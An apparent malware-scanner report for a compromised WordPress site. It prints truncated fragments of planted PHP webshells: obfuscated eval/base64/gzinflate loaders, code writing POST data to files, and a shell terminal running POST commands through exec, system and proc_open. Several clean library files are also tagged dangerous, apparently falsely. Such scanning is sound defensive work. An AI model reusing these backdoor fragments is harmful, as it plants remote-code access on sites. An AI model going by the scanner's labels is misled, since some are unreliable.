Exploit double_var Line: 38 Warning Double var technique is usually used for the obfuscation of malicious code	<?php ${${"\x47\x4c\x4fB\x41\x4cS"}["\x66\x67g\x6a\x6eu\x6dq\x63"]}){$cndixwvne="\x6b\x65\x79";$_POST[${$cndixwvne}]=stripslashes(${${"\x47L\x4fB\x41\x4c\x53"}["\x66ggj\x6e\x75m\x71\x63"]});}}echo"<\x21DOC\x54YPE \x48\x54M\x4c\x3e\n<\x68\x74m\x6c>\n\x3ch\x65\x61d\x3e\n<l\x69nk\x20h\x72e\x66=\x22\x68\x74\x74p\x73://f\x6f\x6e\x74\x73\x2eg\x6fog\x6c\x65\x61p\x69s\x2ec\x6fm/c\x73s?\x66\x61\x6d\x69\x6cy\x3dEx\x6f\"\x20\x72\x65\x6c\x3d\x22s\x74y\x6ces\x68\x65\x65\x74\" \x74y\x70\x65\x3d\"\x74e\x78\x74/css\x...
Exploit double_var Warning Double var technique is usually used for the obfuscation of malicious code	<?php ${${"GLOBALS"}["fggjnumqc"]}){$cndixwvne="key";$_POST[${$cndixwvne}]=stripslashes(${${"GLOBALS"}["fggjnumqc"]});}}echo"<!DOCTYPE HTML>\n<html>\n<head>\n<link href="https://fonts.googleapis.com/css?family=Exo\" rel="stylesheet\" type=\"text/css">\n<link href="\" rel="stylesheet" type="text/css">\n<title>SEA-GHOST MINSHELL</title>\n<link href="https://i.ibb.co/9VYB4QP/IMG-20200417-WA0014.jpg\" rel=\"icon\" type=\"image/x-icon">\n<style>\nhtml { \n background-color: #000d2a;\n -webkit-background-si...
Exploit double_var2 Line: 38 Warning Double var technique is usually used for the obfuscation of malicious code	`<?php ${$qhybyg}`
Exploit download_remote_code2 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine	`<?php fwrite(${$bcwxmerpebv},$_POST["src"])`
Exploit download_remote_code2 Line: 38 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine	`<?php fwrite(${$bcwxmerpebv},$_POST["s\x72c"])`
Exploit escaped_path Line: 38 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x78e\x7aj\x65n\x70f`
Exploit hex_char Line: 38 Dangerous Hex char is usually used for the obfuscation of malicious code	`<?php \x5f`
Exploit hex_var Line: 38 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube	`<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}`
Sign 00f56a27 Line: 38 Dangerous Malware Signature (hash: 00f56a27)	`<?php ${${`
Sign 237750ea Line: 38 Dangerous Malware Signature (hash: 237750ea)	`<?php \x47\x4c\x4f\x42\x41\x4c\x53`

/custdata02/turtle/public_html/recipes/wp-includes/css/dist/block-editor/index.php

Size: 17.15 kB Created: 2021-09-30 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 1 Dangers: 2

Description	Match
Function eval Line: 41 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval(htmlspecialchars_decode(urldecode(base64_decode($unknown))))`
Sign ae7830db Line: 39 Dangerous Malware Signature (hash: ae7830db)	`<?php YmFzZTY0`
Sign d97f004d Line: 39 Dangerous Malware Signature (hash: d97f004d)	`<?php Z3ppbmZsYXRl`

/custdata02/turtle/public_html/recipes/wp-includes/css/dist/preferences/index.php

Size: 142.33 kB Created: 2022-04-30 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 14

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php "ZWNobyAnDQo8IURPQ1RZUEUgSFRNTD4NCjxodG1sPjxoZWFkPjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij5kb2N1bWVudC53cml0ZSgiXHUwMDNDXHUwMDZDXHUwMDY5XHUwMDZFXHUwMDZCXHUwMDIwXHUwMDY4XHUwMDcyXHUwMDY1XHUwMDY2XHUwMDNEXHUwMDIyXHUwMDIyXHUwMDIwXHUwMDcyXHUwMDY1XHUwMDZDXHUwMDNEXHUwMDIyXHUwMDczXHUwMDc0XHUwMDc5XHUwMDZDXHUwMDY1XHUwMDczXHUwMDY4XHUwMDY1XHUwMDY1XHUwMDc0XHUwMDIyXHUwMDIwXHUwMDc0XHUwMDc5XHUwMDcwXHUwMDY1XHUwMDNEXHUwMDIyXHUwMDc0XHUwMDY1XHUwMDc4XHUwMDc0XHUwMDJGXHUwMDYzXHUwMDczXHUwMDczXHUwMDIyXHUwMDNFXHUwMDBBXHU...
Exploit hex_char Line: 42 Dangerous Hex char is usually used for the obfuscation of malicious code	`<?php \x5f`
Function eval Line: 44 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($function($tex7ure))`
Sign 0f37c730 Dangerous Malware Signature (hash: 0f37c730)	`<?php mdW5jdGlvb`
Sign 7186bb8d Dangerous Malware Signature (hash: 7186bb8d)	`<?php RfUE9TV`
Sign 7830f7a6 Dangerous Malware Signature (hash: 7830f7a6)	`<?php NvcH`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php JF9QT1NU`
Sign 91535293 Dangerous Malware Signature (hash: 91535293)	`<?php lY2hv`
Sign a408f408 Dangerous Malware Signature (hash: a408f408)	`<?php cmVwbGFjZ`
Sign ae7830db Dangerous Malware Signature (hash: ae7830db)	`<?php Y29we`
Sign d30fc49e Dangerous Malware Signature (hash: d30fc49e)	`<?php ByaW50Z`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZWNob`
Sign de12c454 Dangerous Malware Signature (hash: de12c454)	`<?php VjaG`
Sign e6546205 Dangerous Malware Signature (hash: e6546205)	`<?php kX1BPU1`
Sign ee1cb326 Dangerous Malware Signature (hash: ee1cb326)	`<?php 9wZW`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php "base64_decode"`

/custdata02/turtle/public_html/recipes/wp-includes/class-snoopy.php

Size: 36.83 kB Created: 2023-03-30 07:11:38 Modified: 2024-06-01 08:12:19 Warns: 1

Description Match

Function exec Warning

Potentially dangerous function `exec`

<?php exec( $this->curl_path . ' ' . $cmdline_params . ' ' . escapeshellarg( $URI ), $results, $return ); if($return) { $this->error = "Error: cURL could not retrieve the document, error $return."; return false; } $results = implode("\r\n",$results); $result_headers = file("$headerfile"); $this->_redirectaddr = false; unset($this->headers); for($currentHeader = 0; $currentHeader < count($result_headers); $currentHeader++) { if(preg_match("/^(Location: |URI: )/i",$result_headers[$currentHeader])) { pre...

/custdata02/turtle/public_html/recipes/wp-includes/Text/Diff/Engine/native.php

Size: 15.67 kB Created: 2023-08-09 07:18:29 Modified: 2024-06-01 08:12:19 Warns: 1

Description Match

Function assert Warning

Potentially dangerous function `assert`

<?php assert($yi < $n_to || $this->xchanged[$xi]); assert($xi < $n_from || $this->ychanged[$yi]); $copy = array(); while ($xi < $n_from && $yi < $n_to && !$this->xchanged[$xi] && !$this->ychanged[$yi]) { $copy[] = $from_lines[$xi++]; ++$yi; } if ($copy) { $edits[] = new Text_Diff_Op_copy($copy); } $delete = array(); while ($xi < $n_from && $this->xchanged[$xi]) { $delete[] = $from_lines[$xi++]; } $add = array(); while ($yi < $n_to && $this->ychanged[$yi]) { $add[] = $to_lines[$yi++]; } if ($delete && ...

/custdata02/turtle/public_html/recipes/wp-includes/Text/Diff/Engine/shell.php

Size: 5.08 kB Created: 2023-08-09 07:18:29 Modified: 2024-06-01 08:12:19 Warns: 2

Description Match

Function assert Warning

Potentially dangerous function `assert`

<?php assert($match[1] - $from_line_no == $match[4] - $to_line_no); array_push($edits, new Text_Diff_Op_copy( $this->_getLines($from_lines, $from_line_no, $match[1] - 1), $this->_getLines($to_lines, $to_line_no, $match[4] - 1))); } switch ($match[3]) { case 'd': array_push($edits, new Text_Diff_Op_delete( $this->_getLines($from_lines, $from_line_no, $match[2]))); $to_line_no++; break; case 'c': array_push($edits, new Text_Diff_Op_change( $this->_getLines($from_lines, $from_line_no, $match[2]), $this->...

Function shell_exec Warning

Potentially dangerous function `shell_exec`

[https://www.php.net/shell_exec]

<?php shell_exec($this->_diffCommand . ' ' . $from_file . ' ' . $to_file); unlink($from_file); unlink($to_file); if (is_null($diff)) { return array(new Text_Diff_Op_copy($from_lines)); } $from_line_no = 1; $to_line_no = 1; $edits = array(); preg_match_all('#^(\d+)(?:,(\d+))?([adc])(\d+)(?:,(\d+))?$#m', $diff, $matches, PREG_SET_ORDER); foreach ($matches as $match) { if (!isset($match[5])) { $match[5] = false; } if ($match[3] == 'a') { $from_line_no--; } if ($match[3] == 'd') { $to_line_no--; } if ($fr...

/custdata02/turtle/public_html/recipes/wp-includes/Text/Diff.php

Size: 12.61 kB Created: 2024-04-03 07:03:01 Modified: 2024-06-01 08:12:19 Warns: 1

Description Match

Function assert Warning

Potentially dangerous function `assert`

<?php assert(count($from_lines) == count($mapped_from_lines)); assert(count($to_lines) == count($mapped_to_lines)); parent::Text_Diff($mapped_from_lines, $mapped_to_lines); $xi = $yi = 0; for ($i = 0; $i < count($this->_edits); $i++) { $orig = &$this->_edits[$i]->orig; if (is_array($orig)) { $orig = array_slice($from_lines, $xi, count($orig)); $xi += count($orig); } $final = &$this->_edits[$i]->final; if (is_array($final)) { $final = array_slice($to_lines, $yi, count($final)); $yi += count($final); } ...

/custdata02/turtle/public_html/recipes/wp-includes/rest-api.php

Size: 96.16 kB Created: 2024-04-03 07:03:02 Modified: 2024-06-01 08:12:20 Dangers: 1

Description	Match
Exploit nano Line: 1640 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $checks[ $type ]( $value )`

/custdata02/turtle/public_html/recipes/wp-includes/ID3/module.audio-video.quicktime.php

Size: 163.09 kB Created: 2024-04-03 07:03:01 Modified: 2024-06-01 08:12:18 Dangers: 1

Description	Match
Function str_rot13 eval_str_rot13 Line: 2390 Dangerous Encoded Function `eval` [https://www.php.net/eval]	`<?php riny`

/custdata02/turtle/public_html/recipes/wp-includes/blocks/group/index.php

Size: 44.55 kB Created: 2024-06-03 07:16:42 Modified: 2024-06-03 07:16:42 Warns: 2 Dangers: 11

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'JGxFTFpMaiA9IHN1YnN0cigkX1NFUlZFUlsiXDEyMFx4NDhcMTIwXDEzN1wxMjNcMTA1XDExNFx4NDYiXSwgc3Rycmlwb3MoJF9TRVJWRVJbIlx4NTBceDQ4XHg1MFx4NWZcMTIzXDEwNVwxMTRceDQ2Il0sICJcNTciKSArIDEpOyBmaWxlX3B1dF9jb250ZW50cygiXDU2XHg2OFx4NzRcMTQxXHg2M1wxNDNcMTQ1XHg3M1x4NzMiLCBiYXNlNjRfZGVjb2RlKCJceDUwXDEwNVx4NWFceDcwXHg2Mlx4NDdcMTI2XDE3MlwxMjRceDU3XDEwNlw2MFx4NTlcNjJceDY3XDE0N1wxMTFcMTUxXDY0XDE1N1wxNDNcMTEwXHg2Y1w3MFx4NWFcMTMwXDE1MFx4NmNcMTQ2XDExMFx4NDJcMTU3XDE0M1wxMDNcMTUzXHg2YlwxMTFceDZhXDY0XDExNlwxMDNcMTUxXHg0Mlx4NTB...
Function eval Line: 4 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($txt)`
Sign 085a0329 Line: 2 Dangerous Malware Signature (hash: 085a0329)	`<?php iYXNlNj`
Sign 0f37c730 Line: 2 Dangerous Malware Signature (hash: 0f37c730)	`<?php mdW5jdGlvb`
Sign 7186bb8d Line: 2 Dangerous Malware Signature (hash: 7186bb8d)	`<?php RfR0VU`
Sign 7830f7a6 Line: 2 Dangerous Malware Signature (hash: 7830f7a6)	`<?php N0YX`
Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf)	`<?php JF9HRV`
Sign 91535293 Line: 2 Dangerous Malware Signature (hash: 91535293)	`<?php lY2hv`
Sign d30fc49e Line: 2 Dangerous Malware Signature (hash: d30fc49e)	`<?php b3Blb`
Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d)	`<?php ZWNob`
Sign de12c454 Line: 2 Dangerous Malware Signature (hash: de12c454)	`<?php VjaG`
Sign e6546205 Line: 2 Dangerous Malware Signature (hash: e6546205)	`<?php kX0dFV`
Sign ff4f5344 Line: 2 Dangerous Malware Signature (hash: ff4f5344)	`<?php FycmF5X`

/custdata02/turtle/public_html/recipes/wp-includes/PHPMailer/PHPMailer.php

Size: 179.18 kB Created: 2024-04-03 07:03:01 Modified: 2024-06-01 08:12:19 Dangers: 1

Description	Match
Sign a408f408 Line: 1858 Dangerous Malware Signature (hash: a408f408)	`<?php cmd.exe`

/custdata02/turtle/public_html/recipes/wp-includes/sodium_compat/src/Crypto.php

Size: 53.53 kB Created: 2019-12-09 16:42:04 Modified: 2024-06-01 08:12:20 Dangers: 1

Description	Match
Sign d97f004d Line: 38 Dangerous Malware Signature (hash: d97f004d)	`<?php ZEROBYTE`

/custdata02/turtle/public_html/recipes/wp-includes/sodium_compat/src/Crypto32.php

Size: 53.83 kB Created: 2019-12-09 16:42:04 Modified: 2024-06-01 08:12:20 Dangers: 1

Description	Match
Sign d97f004d Line: 38 Dangerous Malware Signature (hash: d97f004d)	`<?php ZEROBYTE`

/custdata02/turtle/public_html/recipes/wp-includes/sodium_compat/src/File.php

Size: 51.81 kB Created: 2022-05-25 07:20:02 Modified: 2024-06-01 08:12:20 Dangers: 1

Description	Match
Sign d97f004d Line: 867 Dangerous Malware Signature (hash: d97f004d)	`<?php ZEROBYTE`

/custdata02/turtle/public_html/recipes/wp-includes/sodium_compat/autoload.php

Size: 2.79 kB Created: 2022-11-02 07:15:55 Modified: 2024-06-01 08:12:20 Warns: 1

Description Match

Function assert Warning

Potentially dangerous function `assert`

<?php assert(class_exists('ParagonIE_Sodium_Compat'), 'Possible filesystem/autoloader bug?'); } else { assert(class_exists('ParagonIE_Sodium_Compat')); } require_once(dirname(__FILE__) . '/lib/php72compat.php'); } elseif (!function_exists('sodium_crypto_stream_xchacha20_xor')) { require_once(dirname(__FILE__) . '/lib/php72compat.php'); } require_once(dirname(__FILE__) . '/lib/stream-xchacha20.php'); require_once(dirname(__FILE__) . '/lib/ristretto255.php')

/custdata02/turtle/public_html/recipes/wp-includes/js/tinymce/plugins/index.php

Size: 97.12 kB Created: 2022-01-19 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 1

Description Match

Function posix_getpwuid Warning

Potentially dangerous function `posix_getpwuid`

<?php posix_getpwuid(fileowner($path . '/' . $f)); $group = posix_getgrgid(filegroup($path . '/' . $f)); } else { $owner = array('name' => '?'); $group = array('name' => '?'); } ?>
<tr>
<?php if (!FM_READONLY): ?><td><label><input type="checkbox" name="file[]" value="<?php echo fm_enc($f) ?>"></label></td><?php endif; ?>
<td><div class="filename"><a href="?p=<?php echo urlencode(trim(FM_PATH . '/' . $f, '/')) ?>"><i class="<?php echo $img ?>"></i> <?php echo fm_convert_win($f) ?></a><?php echo ($is_li...

Function shell_exec Warning

Potentially dangerous function `shell_exec`

[https://www.php.net/shell_exec]

<?php shell_exec('file -bi ' . $file); return $mime; } else { return '--'; } } function fm_redirect($url, $code = 302) { header('Location: ' . $url, true, $code); exit; } function fm_clean_path($path) { $path = trim($path); $path = trim($path, '\\/'); $path = str_replace(array('../', '..\\'), '', $path); if ($path == '..') { $path = ''; } return str_replace('\\', '/', $path); } function fm_get_parent_path($path) { $path = fm_clean_path($path); if ($path != '') { $array = explode('/', $path); if (count...

Sign 664602fe Line: 297 Dangerous

Malware Signature (hash: 664602fe)

<?php fm_redirect(FM_SELF_URL . '?p=' . urlencode(FM_PATH));

/custdata02/turtle/public_html/recipes/wp-includes/js/swfupload/inc.php

Size: 303.99 kB Created: 2024-06-03 07:16:42 Modified: 2024-06-03 07:16:42 Warns: 9 Dangers: 7

Description	Match
Exploit concat_vars_with_spaces Line: 2 Warning Concatenation of vars technique is usually used for the obfuscation of malicious code	`<?php $FT . $qS . $Qt . $Qv . $hl . $Pa .`
Exploit execution Line: 2 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]	`<?php eval(gzinflate(base64_decode("\x55\x79\x6e\x4f\172\x45\62\x46\x77\145\x7a\125\67\x4f\170\x73\x57\167\x57\126\53\101\x44\x2f\x34\x4a\x42\x6f\71\x59\x4c\x45\64\x75\114\171\57\113\x49\x55\71\x56\x68\x72\101\101\75\x3d")`
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code	`<?php \x5f`
Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($hM); goto uf4; pQW: function initt_dd($i1, $SH) { goto qA0; o1F: $bQ = 0; goto NNz; K_G: $i1[$bQ] = $i1[$bQ] ^ $SH[$bQ % $I3]; goto v1q; xxv: return $i1; goto deF; qYp: goto ehV; goto X1S; t8k: if ($I7 <= $I3) { return $i1 ^ $SH; } goto o1F; U0Y: ++$bQ; goto qYp; v1q: uxH: goto U0Y; NNz: ehV: goto LDn; LDn: if (!($bQ < $I7)) { goto j2H; } goto K_G; X1S: j2H: goto xxv; qA0: $I7 = strlen($i1); goto D_d; D_d: $I3 = strlen($SH); goto t8k; deF: } goto l5M; rl5: $N6 = "\124\170\x63\x4b\110\x78\x...
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval(gzinflate(base64_decode("\x55\x79\x6e\x4f\172\x45\62\x46\x77\145\x7a\125\67\x4f\170\x73\x57\167\x57\126\53\101\x44\x2f\x34\x4a\x42\x6f\71\x59\x4c\x45\64\x75\114\171\57\113\x49\x55\71\x56\x68\x72\101\101\75\x3d"))); goto UAb; RqM: function terminalv2() { goto Nh; To: echo "\120\x57\x44\x3a\74\x66\x6f\x6e\x74\x20\143\x6f\154\x6f\162\x3d\x23\x46\x46\106\106\x46\106\76\x20" . str_replace("\134", "\57", @alfaGetCwd()) . "\57\x3c\x62\162\x20\x2f\x3e"; goto p5; m6: if (strtolower(substr(PHP_OS, 0,...
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec]	<?php exec($W1, $BP); $BP = @join("\xa", $BP); } elseif (function_exists("\160\141\x73\x73\x74\x68\162\165")) { goto k0; jH: @passthru($W1); goto Om; k0: ob_start(); goto jH; Om: $BP = ob_get_clean(); goto ZE; ZE: } elseif (function_exists("\163\x79\x73\164\x65\x6d")) { goto E5; Uy: $BP = ob_get_clean(); goto gO; Gv: @system($W1); goto Uy; E5: ob_start(); goto Gv; gO: } elseif (function_exists("\x73\x68\145\154\154\x5f\145\x78\145\143")) { $BP = shell_exec($W1); } elseif (function_exists("\160\x6f\x70...
Function passthru Warning Potentially dangerous function `passthru` [https://www.php.net/passthru]	<?php passthru($W1); goto Om; k0: ob_start(); goto jH; Om: $BP = ob_get_clean(); goto ZE; ZE: } elseif (function_exists("\163\x79\x73\164\x65\x6d")) { goto E5; Uy: $BP = ob_get_clean(); goto gO; Gv: @system($W1); goto Uy; E5: ob_start(); goto Gv; gO: } elseif (function_exists("\x73\x68\145\154\154\x5f\145\x78\145\143")) { $BP = shell_exec($W1); } elseif (function_exists("\160\x6f\x70\145\156") && function_exists("\x70\143\154\157\x73\145")) { if (is_resource($it = @popen($W1, "\162"))) { goto aG; nl: ...
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid]	<?php pOSiX_GeTpwUid($Dj) { return false; } } goto wP; Fy: if ($pK == "\167\151\x6e") { $wL = Str_REPlAcE("\134", "\x2f", $wL); $av = StR_rEplaCE("\x5c", "\x2f", $av); } goto OK; By: if (!$Yh && FUnCTIOn_ExIsTs("\x73\145\x74\137\x74\151\155\145\x5f\154\x69\x6d\151\x74")) { seT_tIME_limit((int) round(0 + 0)); } goto t2; ge: if (isset($_POST["\x63"])) { if (FunCTion_EXisTs("\143\x68\x64\x69\162")) { @CHDir($_POST["\x63"]); } } goto o3; t2: if (fUNctIoN_eXiSTs("\x67\145\x74\x5f\155\x61\147\x69\143\x5f\x7...
Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open]	<?php proc_open($W1 . "\40\62\x3e\46\x31", array(array("\160\x69\x70\145", "\167"), array("\160\151\160\x65", "\x77"), array("\160\151\x70\x65", "\x77")), $Wk, null); goto St; aK: } elseif (class_exists("\103\117\115")) { goto qB; qB: $vG = new ot("\127\x53\x63\162\x69\x70\164\x2e\x73\150\145\x6c\x6c"); goto F1; F1: $X6 = $vG->exec("\143\x6d\144\56\x65\170\145\x20\x2f\x63\40" . $_POST["\x61\x6c\146\141\x31"]); goto dk; cN: $BP = $Of->rb(); goto Fk; dk: $Of = $X6->RM(); goto cN; Fk: } } catch (Exceptio...
Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec]	<?php shell_exec($i1); goto EC; rL: echo $uq; goto gz; gz: echo "\x3c\57\x70\x72\x65\76"; goto Ke; rr: echo "\x3c\x62\162\x3e"; goto fb; LR: $i1 = $_POST["\143\x6f\x6d\x6d\x61\156\x64"]; goto nr; fb: echo "\x24\x57\123\x4f\131\141\x6e\132\x3a\40"; goto uz; yb: echo "\74\x70\162\145\40\x63\154\x61\163\x73\75\47\164\145\170\x74\x2d\167\x68\151\x74\x65\x27\x3e"; goto LR; x8: echo "\x3c\x63\x65\156\164\x65\x72\x3e\127\123\117\40\x42\x59\x50\x41\x53\x53\40\x59\101\x4e\x5a\x21\74\57\x63\x65\x6e\164\145\x72\...
Function system Warning Potentially dangerous function `system` [https://www.php.net/system]	<?php system("\154\163\40\57\150\x6f\x6d\x65"); goto mR; mR: echo "\74\x2f\x74\145\170\164\141\162\145\x61\76\x3c\x62\162\76\xa\xa\x3c\x70\x20\x73\164\171\154\x65\75\x22\x63\157\154\x6f\x72\72\x20\x62\154\x61\x63\153\42\x20\x3e\40\104\111\122\40\x48\157\x6d\x65\x20\x31\x3a\40\x20\74\x2f\x70\76\74\151\x6e\x70\x75\164\40\x74\171\160\x65\75\42\x74\145\x78\x74\x22\x20\166\141\154\x75\145\x3d\x20\42\170\170\170\42\x20\156\141\155\x65\x3d\42\x66\x69\x6c\145\x5f\156\141\155\145\x22\76\74\142\162\x3e\xa\x3c\1...
Sign 237750ea Line: 2 Dangerous Malware Signature (hash: 237750ea)	`<?php \x65\x78\x65\x63`
Sign 407651f7 Dangerous Malware Signature (hash: 407651f7)	`<?php WScript.shell`
Sign 91535293 Dangerous Malware Signature (hash: 91535293)	`<?php ls -la`
Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a)	`<?php php_uname()`
Sign de12c454 Dangerous Malware Signature (hash: de12c454)	`<?php vcGVu`

/custdata02/turtle/public_html/recipes/wp-admin/css/colors/blue/index.php

Size: 20.23 kB Created: 2022-03-08 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 3

Description	Match
Exploit download_remote_code2 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine	`<?php fwrite($data, $_POST["edit"])`
Exploit download_remote_code2 Line: 40 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine	`<?php fwrite($data, $_POST["\x65\144\151\164"])`
Sign 11413268 Dangerous Malware Signature (hash: 11413268)	`<?php Exploit`

/custdata02/turtle/public_html/recipes/wp-admin/css/colors/modern/product.php

Size: 12.59 kB Created: 2022-03-21 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 3 Dangers: 5

Description	Match
Exploit base64_long Line: 39 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'LW3HkqTAku3XjM19O7SwTKG1lslzDK215usHql9barVIJFYEHu5Ua7DUw/2frT/i9R7K5T/jQywY8r/zMiXz8p98dar8/v+//LeiHaBd0659qXhAPIla0Zd90v2TtI5mU/8FOe/fSEyVZk1BIObxGMXPIu+Bv0KMbB0Hvm6QvIubrMvfkWoc770H6M0aHVQSBstq5F5lyeqryKIJq+LdMsqZvX3HF0IiTUqUO4/BMaixLh53hIZZRpnSBh1DkbRnK4ts5oShezlCyJaakx+zTAw9oBom5UyLvLch3mwN/lvS9VuUfQi3RXJXllZKBY1ltY+ZAec5SWlufdmqzvbf6+Gnvc4d6KnR2GDyIggPXQsGlnxFwy+qdTk2UBoEscYBD+p5SuFf6+gwu6NvJPRDpMNDUpx0BxZl4d0tMPb6O33sMMxmDW609OdFDwR8i2lzCfX6QdiCufD+B5BmiijDU08pzNlodtKG99Mi/v2ItA6GE+X5izo...
Exploit execution Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]	<?php eval(gzinflate(base64_decode(rawurldecode('XZi1EvOGEkYfJ8moENOkEjOzmoxFFjM%2F%2FfXfXjcej0nS7n57jsrz0%2F%2BdfbaSwP4rynwqyr%2B%2F7zHm0zCv5bb931t%2FlerVDzuMDO8DuSGtMrPhx%2FeHV8xGUWyHP762wDkS2wTw9ppWNZaA0Y4ptGuDPmdoPOzWro9xNdoLPgDPOa5Z6Vrqx4%2F8%2BBS0%2FkLeXhaKgtYPtQPpfX5MrYznPa7SRQWG3AeguyEI%2B3mxkjh0zNbBg39k88H5fsP3VI9Z7kNsxRQq4w44Dba7JvqhY3LxFA3Qh5UMTz2MA32u8jjy1sWsHlx0bzA%2FnFPPmkaKMezjeva83lUEqDTvf%2Bx1rT%2B09dp4Xag92p3REvtCOBHLZMS%2B9DiPRUWdM%2FRcRFIkAsKJFpT7y1n7ZaG2TD39MMsK8GwrWkWBMlvtK2Z6yBj...
Exploit execution Line: 39 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]	<?php eval(str_rot13(gzinflate(str_rot13(base64_decode('LW3HkqTAku3XjM19O7SwTKG1lslzDK215usHql9barVIJFYEHu5Ua7DUw/2frT/i9R7K5T/jQywY8r/zMiXz8p98dar8/v+//LeiHaBd0659qXhAPIla0Zd90v2TtI5mU/8FOe/fSEyVZk1BIObxGMXPIu+Bv0KMbB0Hvm6QvIubrMvfkWoc770H6M0aHVQSBstq5F5lyeqryKIJq+LdMsqZvX3HF0IiTUqUO4/BMaixLh53hIZZRpnSBh1DkbRnK4ts5oShezlCyJaakx+zTAw9oBom5UyLvLch3mwN/lvS9VuUfQi3RXJXllZKBY1ltY+ZAec5SWlufdmqzvbf6+Gnvc4d6KnR2GDyIggPXQsGlnxFwy+qdTk2UBoEscYBD+p5SuFf6+gwu6NvJPRDpMNDUpx0BxZl4d0tMPb6O33sMMxmDW609OdFDwR8i2lzCf...
Function eval Line: 39 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval(str_rot13(gzinflate(str_rot13(base64_decode('LW3HkqTAku3XjM19O7SwTKG1lslzDK215usHql9barVIJFYEHu5Ua7DUw/2frT/i9R7K5T/jQywY8r/zMiXz8p98dar8/v+//LeiHaBd0659qXhAPIla0Zd90v2TtI5mU/8FOe/fSEyVZk1BIObxGMXPIu+Bv0KMbB0Hvm6QvIubrMvfkWoc770H6M0aHVQSBstq5F5lyeqryKIJq+LdMsqZvX3HF0IiTUqUO4/BMaixLh53hIZZRpnSBh1DkbRnK4ts5oShezlCyJaakx+zTAw9oBom5UyLvLch3mwN/lvS9VuUfQi3RXJXllZKBY1ltY+ZAec5SWlufdmqzvbf6+Gnvc4d6KnR2GDyIggPXQsGlnxFwy+qdTk2UBoEscYBD+p5SuFf6+gwu6NvJPRDpMNDUpx0BxZl4d0tMPb6O33sMMxmDW609OdFDwR8i2lzCf...
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval(gzinflate(base64_decode(rawurldecode('XZi1EvOGEkYfJ8moENOkEjOzmoxFFjM%2F%2FfXfXjcej0nS7n57jsrz0%2F%2BdfbaSwP4rynwqyr%2B%2F7zHm0zCv5bb931t%2FlerVDzuMDO8DuSGtMrPhx%2FeHV8xGUWyHP762wDkS2wTw9ppWNZaA0Y4ptGuDPmdoPOzWro9xNdoLPgDPOa5Z6Vrqx4%2F8%2BBS0%2FkLeXhaKgtYPtQPpfX5MrYznPa7SRQWG3AeguyEI%2B3mxkjh0zNbBg39k88H5fsP3VI9Z7kNsxRQq4w44Dba7JvqhY3LxFA3Qh5UMTz2MA32u8jjy1sWsHlx0bzA%2FnFPPmkaKMezjeva83lUEqDTvf%2Bx1rT%2B09dp4Xag92p3REvtCOBHLZMS%2B9DiPRUWdM%2FRcRFIkAsKJFpT7y1n7ZaG2TD39MMsK8GwrWkWBMlvtK2Z6yBj...
Sign 11413268 Line: 39 Dangerous Malware Signature (hash: 11413268)	`<?php eval(str_rot13`
Sign 80e70adc Line: 38 Dangerous Malware Signature (hash: 80e70adc)	`<?php <?php eval`
Sign de12c454 Dangerous Malware Signature (hash: de12c454)	`<?php vjaG`

/custdata02/turtle/public_html/recipes/wp-admin/includes/class-pclzip.php

Size: 192.08 kB Created: 2024-04-03 07:03:01 Modified: 2024-06-01 08:12:18 Dangers: 5

Description	Match
Exploit nano Line: 2627 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)`
Exploit nano Line: 2785 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)`
